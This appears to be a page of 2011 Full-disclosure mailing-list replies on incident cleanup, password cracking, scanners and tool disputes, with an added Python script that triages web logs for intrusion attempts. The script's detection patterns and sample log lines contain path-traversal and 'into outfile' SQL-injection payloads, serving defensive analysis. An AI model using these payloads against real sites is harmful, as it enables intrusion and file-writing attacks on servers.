If it was a rootkit then trying to run the outdated rkhunter would be a moot point. Whatever seizes the kernel first wins, hands down. Fortunately for him, since the bot was so easy to find in the first place and such a simple way of maintaining it, the box was clearly seized by someone who didn't give a rat's ass about it. Probably a skiddie or an automated attack to begin with. As for plugging any security holes, check your httpd error logs. If you noted down the time of the bot file's creation date you would look around the same time for suspicious log entries. If they were as careless in scrubbing the logs as they were holding the box it would give you a look into how it may have been compromised. If you're getting things like ../.../../../../etc/passwd then some sort of LFI vuln was likely exploited, start grepping your php files for stuff like include(), or if you're getting something like "into outfile" then check your mysql user permissions and don't let it have file perms, and then start grepping down for SQL vulns. If it comes down to being too much of a hassle to get all the obvious vulns at least then go to your boss, admit there is an issue and that time needs to be taken to remove such legacy code as this could have been a far worse incident if it had been more targeted and the end goal wasn't a botnet.

On Dec 5, 2011 3:02 AM, Dan Ballance tzewang.do...@gmail.com wrote:

I'm no expert, but here's something to get you started while you wait for more experienced replies. Check for root kits:

sudo apt-get install rkhunter
sudo rkhunter --update
sudo rkhunter --check

On 5 December 2011 10:44, Lucio Crusca lu...@sulweb.org wrote
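The log-triage advice Gage gives (look at the web logs around the bot file's creation time for traversal attempts and "into outfile", then decide whether to hunt for an LFI or a SQL injection), as an added Python example that is not code from the thread. The Apache access-log lines, client addresses and creation timestamp are constructed; the timestamp loosely follows the capture time in the ISP report. Requests are URL-decoded twice before matching, since encoded and double-encoded traversal is common in these probes, and the next-step hints restate what the post recommends.

```python
"""Web-log triage for a suspected LFI / SQL-injection entry point.
Added example, not code from the thread.  Sample data is constructed."""
import re
from datetime import datetime, timedelta, timezone
from urllib.parse import unquote

# Apache common/combined access log: client IP, timestamp, request line, status.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<req>[^"]*)" (?P<status>\d{3})'
)
TS_FMT = "%d/%b/%Y:%H:%M:%S %z"

# The two indicators named in the post: traversal/LFI, and MySQL INTO OUTFILE via SQLi.
INDICATORS = {
    "lfi/traversal": re.compile(r"\.\./|\.\.\\|/etc/passwd|/proc/self/environ", re.I),
    "sqli/into-outfile": re.compile(r"\binto\s+(?:out|dump)file\b|\bunion\s+select\b", re.I),
}

# Follow-up the post recommends for each kind of hit.
NEXT_STEPS = {
    "lfi/traversal": "grep the PHP tree for include() on user-controlled paths",
    "sqli/into-outfile": "revoke the FILE privilege from the web app's MySQL user, then grep for SQL vulns",
}


def parse_line(line):
    """Parse one access-log line; return None for lines that do not match."""
    m = LOG_RE.match(line)
    if not m:
        return None
    return {
        "ip": m["ip"],
        "ts": datetime.strptime(m["ts"], TS_FMT),
        # Decode twice: double-encoded traversal (%252e%252e) is a common evasion.
        "req": unquote(unquote(m["req"])),
        "status": int(m["status"]),
    }


def triage(lines, bot_created, window=timedelta(hours=2)):
    """Return (kind, ip, iso_timestamp, decoded_request) for suspicious
    requests within +/- window of the bot file's creation time."""
    hits = []
    for line in lines:
        e = parse_line(line)
        if e is None or abs(e["ts"] - bot_created) > window:
            continue
        for kind, pat in INDICATORS.items():
            if pat.search(e["req"]):
                hits.append((kind, e["ip"], e["ts"].isoformat(), e["req"]))
                break
    return hits


def next_steps(hits):
    """Distinct follow-up actions, in the order the hit kinds first appear."""
    seen = []
    for kind, *_ in hits:
        if kind not in seen:
            seen.append(kind)
    return [NEXT_STEPS[k] for k in seen]


# Constructed sample: probes about an hour before the bot appeared, one benign
# request, and an old probe outside the window that should be ignored.
SAMPLE_LOG = """\
203.0.113.7 - - [03/Dec/2011:20:55:12 +0100] "GET /index.php?option=com_virtuemart&page=..%2f..%2f..%2f..%2fetc%2fpasswd HTTP/1.1" 200 1847
203.0.113.7 - - [03/Dec/2011:20:56:40 +0100] "GET /index.php?option=com_virtuemart&page=../../../../proc/self/environ HTTP/1.1" 200 2211
198.51.100.20 - - [03/Dec/2011:21:01:03 +0100] "GET /index.php?id=1%20union%20select%201,2%20into%20outfile%20'/tmp/x.php' HTTP/1.1" 500 412
192.0.2.55 - - [03/Dec/2011:21:05:09 +0100] "GET /images/logo.png HTTP/1.1" 200 9034
203.0.113.7 - - [01/Dec/2011:09:12:00 +0100] "GET /index.php?page=../../../../etc/passwd HTTP/1.1" 404 210
"""
# Constructed creation time of the bot files (GMT+1), roughly the report's capture time.
BOT_CREATED = datetime(2011, 12, 3, 22, 3, 48, tzinfo=timezone(timedelta(hours=1)))

if __name__ == "__main__":
    found = triage(SAMPLE_LOG.splitlines(), BOT_CREATED)
    for hit in found:
        print(*hit)
    print(next_steps(found))
```

On a real box, feed it the access and error logs for the day the bot files appeared and widen the window if the attacker sat on the shell for a while; a 200 on a traversal request is the line to chase first, because it means the include actually succeeded.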
Re: [Full-disclosure] Large password list
I think it simply makes sense though. As more and more common passwords are cracked by the multitude of boxes out there dedicated to cracking hashes, the more and more likely that it's gonna turn up in a list or a site somewhere. Add in that Google is really good at finding long strings and numbers if they exist on the net and the fact that the entire idea behind hashes is for them to be unique... yeah.

On Dec 2, 2011 11:17 AM, Charles Morris cmor...@cs.odu.edu wrote:

This is extremely depressing.

On Fri, Dec 2, 2011 at 2:14 PM, Jeffrey Walton noloa...@gmail.com wrote:

On Thu, Dec 1, 2011 at 10:59 PM, Sanguinarious Rose sanguiner...@occultusterra.com wrote:

I am at a lack of words for this, why pay $4.99 when you can just do some simple googling? You can even search pastebin and get a mass collection of password lists from dbases. Add a dash of awk and maybe a pinch of sed and voilà! Why even spend the CPU cycles to process the password list?

See Jon Callas' post on the Random Bits mailing list: No one bothers cracking the crypto (real life edition), http://lists.randombit.net/pipermail/cryptography/2011-December/001870.html. Interestingly (sadly?), googling the hash worked quite well for me on a number of test cases, including common words and proper names. Jeff
Re: [Full-disclosure] New open source Security Framework
I grab a bag of popcorn whenever Juan sends an email.

On Wed, Oct 5, 2011 at 4:25 AM, valdis.kletni...@vt.edu wrote:

On Wed, 05 Oct 2011 06:49:40 -0300, root said:

How can I earn money by migrating exploits? You will immediately receive $2 (US Dollars) in your PayPal account for each approved exploit.

At $2 per pop, you're going to see a lot of exploits that look like they were mass-migrated by a Perl script, or by an 11 year old, because those are the only two ways it makes economic sense for somebody to work for that pay rate. Man, is it too early in the morning to make popcorn?
Re: [Full-disclosure] New open source Security Framework
Would you kindly die in a fire?
Re: [Full-disclosure] Question on root credentials for scanning
Well it depends on the scanner, and by my guess you're likely using nmap and so yes root privs are required mainly to access raw sockets so it can use its nifty math to figure out all the cool bits. Generally speaking such privs are required by anything that does anything really useful.

On Sep 22, 2011 10:47 AM, Shobana Narayanaswamy snar...@opnet.com wrote:

Hi: I am a newbie to security and scanning. Here is my question: Do you generally need root credentials in order for the scan to produce detailed results? When I run a scan without root credentials, it comes up with very little info. However, when I supply root credentials, I get several useful reports. It appears that the scanner detects the OS version and other s/w component versions only if it is provided root access. Thanks
Re: [Full-disclosure] Western Union Certificate Error
Comodo got hacked a while back and mass certificates compromised; judging by that certificate you probably encountered one of the stolen ones.

On Wed, Sep 7, 2011 at 7:40 AM, JT S whyteho...@gmail.com wrote:

I recently got this error:

You attempted to reach www.westernunion.com, but instead you actually reached a server identifying itself as wumt.westernunion.com. This may be caused by a misconfiguration on the server or by something more serious. An attacker on your network could be trying to get you to visit a fake (and potentially harmful) version of www.westernunion.com. You should not proceed.

Attached is a screenshot of the error and certificate info.

SHA-256=9F 26 1E 37 F3 6A 34 88 AD 65 54 88 E0 5C 8A 13 C6 69 D4 FE 2A 25 0F DA 2C 51 13 1E 08 F8 DA 6F

Cert was issued by Comodo. A google of the SHA comes up with ICANN but other sites come up with nothing... And then I read from comodo themselves they got breached and fraudulent certs were issued... http://www.comodo.com/Comodo-Fraud-Incident-2011-03-23.html
Re: [Full-disclosure] Reverse Proxy
Well your options are limited. You can look for some type of information disclosure, find other hosts the target owns and then scan their subnets for http servers, etc. And of course if the situation permits it, pwn the proxy and check their logs. Assuming you have permission naturally :P

On Tue, Aug 30, 2011 at 1:58 PM, char...@funkymunkey.com wrote:

Hi, I am wondering how someone would find out the IP address of a web server if it were behind a reverse proxy, but still on a public IP? Say for instance, the website was using CloudFlare, the A record points to CloudFlare but the website is hosted elsewhere on a public IP. Charlie
Re: [Full-disclosure] INSECT Pro - Free tool for pentest - New version release 2.7
People hate you because you've been stealing software, slapping a new wrapper on it, and calling it your own. All other complaints, criticisms, or even approvals are nothing in light of that simple fact. A light that was cast the first time you released InsectPro to FD and all you got was a horde of angry researchers telling you to shut up and stop sending stupid crap like your stolen software to FD. No one is telling you to not use it, hell only a few people are telling you not to share it. But almost everybody is telling you to KEEP CRAP LIKE THIS OFF FULL DISCLOSURE. You can argue the crap point all you want and be dismissive, but you'll just be missing the point.

On Mon, Aug 29, 2011 at 9:45 AM, Juan Sacco jsa...@insecurityresearch.com wrote:

You are comparing a new product with others who have years of development, it is not fair. If you like Core Impact or Metasploit Express, please pay your license and use them. I'm not pushing you to use my software. INSECT Pro is free and I do it because I like it. Not to like you. Juan Sacco ( runlvl )

On Mon, 29 Aug 2011 13:24:15 -0300, root wrote:

On 08/27/2011 08:54 AM, Mario Vilas wrote:

On Sat, Aug 27, 2011 at 4:27 AM, GloW - XD doo...@gmail.com wrote:

when is someone going to warez this... it ain't free.. http://www.insecurityresearch.com/files/

It's just a GUI slapped to a bunch of public exploits taken from metasploit and exploit-db. Totally unlike serious software like metasploit-pro and core impact.

-- Insecurity Research - Security auditing and testing software Web: http://www.insecurityresearch.com Insect Pro 2.6.1 was released, stay tuned
Re: [Full-disclosure] [Security Tool - Video] INSECT Pro 2.6.1 available
These guys just ought to be really happy it's a fricken pain in the ass to get mod_frontpage 5.2 working these days or some highly annoyed person could start churning up a private exploit for the known associated vulnerability. That or fire up canvas/core impact (I don't remember which one had the exploit for it), but sadly no public exploit for it or he would likely have gone down fast and hard.